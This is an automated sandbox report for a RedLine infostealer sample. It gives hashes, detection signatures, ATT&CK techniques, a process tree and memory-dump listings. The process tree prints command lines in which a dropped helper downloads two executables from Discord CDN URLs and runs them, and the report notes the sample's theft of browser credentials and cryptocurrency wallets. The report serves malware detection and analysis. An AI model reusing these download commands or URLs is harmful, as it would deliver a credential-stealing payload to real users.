redline | 46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635

Analysis

max time kernel
121s
max time network
126s
platform
windows10_x64
resource
win10-en-20211014
submitted
22-10-2021 14:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.exe
Size

457KB
MD5

0eb7bedd631c3107c5f65c109ac8bf2e
SHA1

8d83f0286f73481b2eca565bf31395fb0db3f54c
SHA256

46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635
SHA512

75c443d811a7e75f96607a440dcc1c51cf158a5505de5a1453e4723a2bf9b18778119a14a3f4b9d63b9c93ea43da0a6f620414e9fff92fd889b48db404b6ed09

Score

10^/10

redline discovery infostealer spyware stealer suricata upx

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\15430\18.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\15430\18.exe	family_redline

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

extd.exeextd.exeextd.exe18.exeTransmissibility.exeextd.exe

pid process

3220 extd.exe
4064 extd.exe
4000 extd.exe
4504 18.exe
4532 Transmissibility.exe
4560 extd.exe

pid	process
3220	extd.exe
4064	extd.exe
4000	extd.exe
4504	18.exe
4532	Transmissibility.exe
4560	extd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

18.exe

pid process

4504 18.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

18.exeTransmissibility.exe

description pid process

Token: SeDebugPrivilege 4504 18.exe
Token: SeDebugPrivilege 4532 Transmissibility.exe

pid	process
4504	18.exe

description	pid	process
Token: SeDebugPrivilege	4504	18.exe
Token: SeDebugPrivilege	4532	Transmissibility.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.execmd.exe

description	pid	process	target process
PID 2860 wrote to memory of 1556	2860	46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.exe	cmd.exe
PID 2860 wrote to memory of 1556	2860	46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.exe	cmd.exe
PID 1556 wrote to memory of 3220	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 3220	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 4064	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 4064	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 4000	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 4000	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 4504	1556	cmd.exe	18.exe
PID 1556 wrote to memory of 4504	1556	cmd.exe	18.exe
PID 1556 wrote to memory of 4504	1556	cmd.exe	18.exe
PID 1556 wrote to memory of 4532	1556	cmd.exe	Transmissibility.exe
PID 1556 wrote to memory of 4532	1556	cmd.exe	Transmissibility.exe
PID 1556 wrote to memory of 4560	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 4560	1556	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.exe
"C:\Users\Admin\AppData\Local\Temp\46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2860

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\B549.bat C:\Users\Admin\AppData\Local\Temp\46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3220

C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4064

C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4000

C:\Users\Admin\AppData\Local\Temp\15430\18.exe
18.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Users\Admin\AppData\Local\Temp\15430\Transmissibility.exe
Transmissibility.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4560

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\15430\18.exe
MD5
19089d8f5fb2ce7b4615059cba246b22

SHA1
f2c143e5351a6900a2cecca9e89346610ca27be5

SHA256
ffb2605674ae69ecb24d0c3614117e7a3c8207b985d66330a6e6b656d44a175a

SHA512
9162ec7d494327bbf5ddbf977d1a5a7910dfeeab7c7e509237ba9be66bcf25a9f9961190133b44eecf55ff547a25954342ce2eed4c2866c2fe0bc6c3136bbb7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\15430\18.exe
MD5
19089d8f5fb2ce7b4615059cba246b22

SHA1
f2c143e5351a6900a2cecca9e89346610ca27be5

SHA256
ffb2605674ae69ecb24d0c3614117e7a3c8207b985d66330a6e6b656d44a175a

SHA512
9162ec7d494327bbf5ddbf977d1a5a7910dfeeab7c7e509237ba9be66bcf25a9f9961190133b44eecf55ff547a25954342ce2eed4c2866c2fe0bc6c3136bbb7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\15430\Transmissibility.exe
MD5
ee7b54950381499d349cc3d50d2bdc0d

SHA1
bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

SHA256
622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

SHA512
86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

Download Submit
C:\Users\Admin\AppData\Local\Temp\15430\Transmissibility.exe
MD5
ee7b54950381499d349cc3d50d2bdc0d

SHA1
bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

SHA256
622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

SHA512
86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

Download Submit
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\B549.bat
MD5
f10c1206eadf7548e8b2411a141e0d4b

SHA1
52d988994030198a607a74a96510834d0626445f

SHA256
c02f2edc9fa4aabea6ba0fd8638cb91255f3eb4339383ba75eced5098c89654c

SHA512
bffb1d9f0f305d0926131834d94eafbe2103b69ed5b0bda1bdc6213d322a69599c54befb93ae28eb59d96721d4cc703d05551b41a9fe0c1296cf305da3edc5fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B537.tmp\B538.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
memory/1556-115-0x0000000000000000-mapping.dmp

Download
memory/3220-117-0x0000000000000000-mapping.dmp

Download
memory/4000-122-0x0000000000000000-mapping.dmp

Download
memory/4064-120-0x0000000000000000-mapping.dmp

Download
memory/4504-147-0x0000000006000000-0x0000000006001000-memory.dmp

Filesize
4KB

Download
memory/4504-140-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/4504-159-0x0000000007990000-0x0000000007991000-memory.dmp

Filesize
4KB

Download
memory/4504-158-0x0000000006AE0000-0x0000000006AE1000-memory.dmp

Filesize
4KB

Download
memory/4504-134-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/4504-136-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

Filesize
4KB

Download
memory/4504-154-0x0000000007410000-0x0000000007411000-memory.dmp

Filesize
4KB

Download
memory/4504-138-0x0000000004E40000-0x0000000004E41000-memory.dmp

Filesize
4KB

Download
memory/4504-151-0x0000000005F60000-0x0000000005F61000-memory.dmp

Filesize
4KB

Download
memory/4504-148-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/4504-141-0x0000000004F10000-0x0000000004F11000-memory.dmp

Filesize
4KB

Download
memory/4504-142-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/4504-143-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/4504-144-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/4504-150-0x0000000006500000-0x0000000006501000-memory.dmp

Filesize
4KB

Download
memory/4504-149-0x0000000005E80000-0x0000000005E81000-memory.dmp

Filesize
4KB

Download
memory/4504-124-0x0000000000000000-mapping.dmp

Download
memory/4532-146-0x000001DEECB24000-0x000001DEECB25000-memory.dmp

Filesize
4KB

Download
memory/4532-126-0x0000000000000000-mapping.dmp

Download
memory/4532-145-0x000001DEECB22000-0x000001DEECB24000-memory.dmp

Filesize
8KB

Download
memory/4532-139-0x000001DEECB20000-0x000001DEECB22000-memory.dmp

Filesize
8KB

Download
memory/4532-152-0x000001DEECB25000-0x000001DEECB27000-memory.dmp

Filesize
8KB

Download
memory/4532-153-0x000001DEEE060000-0x000001DEEE380000-memory.dmp

Filesize
3.1MB

Download
memory/4532-137-0x000001DEECB30000-0x000001DEECE5C000-memory.dmp

Filesize
3.2MB

Download
memory/4532-155-0x000001DEEFA30000-0x000001DEEFC8C000-memory.dmp

Filesize
2.4MB

Download
memory/4532-156-0x000001DEF0160000-0x000001DEF0161000-memory.dmp

Filesize
4KB

Download
memory/4532-157-0x000001DEECFE0000-0x000001DEECFE1000-memory.dmp

Filesize
4KB

Download
memory/4532-129-0x000001DEEA110000-0x000001DEEA111000-memory.dmp

Filesize
4KB

Download
memory/4560-132-0x0000000000000000-mapping.dmp

Download